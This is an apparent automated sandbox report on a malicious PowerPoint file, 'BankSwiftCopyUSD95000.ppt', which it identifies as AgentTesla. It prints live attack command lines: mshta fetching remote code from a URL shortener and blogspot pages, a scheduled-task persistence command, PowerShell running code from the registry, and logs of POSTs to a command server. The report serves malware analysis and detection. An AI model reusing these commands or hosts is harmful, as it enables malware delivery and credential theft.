Loading ...

Play interactive tourEdit tour

Analysis Report BankSwiftCopyUSD95000.ppt

Overview

General Information

Sample Name:BankSwiftCopyUSD95000.ppt
Analysis ID:339086
MD5:7f0b415d0b7a76530b2f510a910811e5
SHA1:480594ad26c91dd9d719c80334285375540dc83e
SHA256:8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
Tags:ppt

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Yara detected AgentTesla
.NET source code contains very large array initializations
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • POWERPNT.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cmd.exe (PID: 1276 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 2476 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt' MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
      • PING.EXE (PID: 2776 cmdline: ping.exe MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
      • mshta.exe (PID: 2756 cmdline: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2816 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
          • MSBuild.exe (PID: 2720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
        • schtasks.exe (PID: 3036 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\') MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)
        • cmd.exe (PID: 2340 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • taskkill.exe (PID: 956 cmdline: taskkill /f /im winword.exe MD5: 3722FA501DCB50AE42818F9034906891)
          • taskkill.exe (PID: 1620 cmdline: taskkill /f /im EXCEL.exe MD5: 3722FA501DCB50AE42818F9034906891)
      • PING.EXE (PID: 2720 cmdline: ping.exe MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
  • taskeng.exe (PID: 2168 cmdline: taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • mshta.exe (PID: 2368 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
      • mshta.exe (PID: 600 cmdline: 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 288 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 848 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • powershell.exe (PID: 2796 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • mshta.exe (PID: 2468 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2236 cmdline: 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1776 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 592 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2224 cmdline: 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html MD5: 95828D670CFD3B16EE188168E083C3C5)
  • mshta.exe (PID: 532 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2112 cmdline: 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            29.2.MSBuild.exe.400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Powershell execute code from registryShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine|base64offset|contains: z+, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, ProcessId: 2816
              Sigma detected: Schedule script from internet via mshtaShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), ProcessId: 3036
              Sigma detected: MSHTA Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine|base64offset|contains: z+, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, ProcessId: 2816
              Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, CommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 2476, ProcessCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ProcessId: 2756

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: BankSwiftCopyUSD95000.pptAvira: detected
              Multi AV Scanner detection for submitted fileShow sources
              Source: BankSwiftCopyUSD95000.pptVirustotal: Detection: 34%Perma Link
              Source: BankSwiftCopyUSD95000.pptReversingLabs: Detection: 21%
              Machine Learning detection for sampleShow sources
              Source: BankSwiftCopyUSD95000.pptJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2
              Source: Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
              Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

              Software Vulnerabilities:

              barindex
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\PING.EXEJump to behavior
              Source: powerpnt.exeMemory has grown: Private usage: 0MB later: 10MB
              Source: global trafficDNS query: name: j.mp
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 108.177.127.132:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.16:80

              Networking:

              barindex
              Connects to a URL shortener serviceShow sources
              Source: unknownDNS query: name: j.mp
              Connects to a pastebin service (likely for C&C)Show sources
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Uses ping.exe to check the status of other devices and networksShow sources
              Source: unknownProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
              Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
              Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
              Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
              Source: Joe Sandbox ViewASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: global trafficHTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
              Source: global trafficHTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comt\ equals www.linkedin.com (Linkedin)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: j.mp
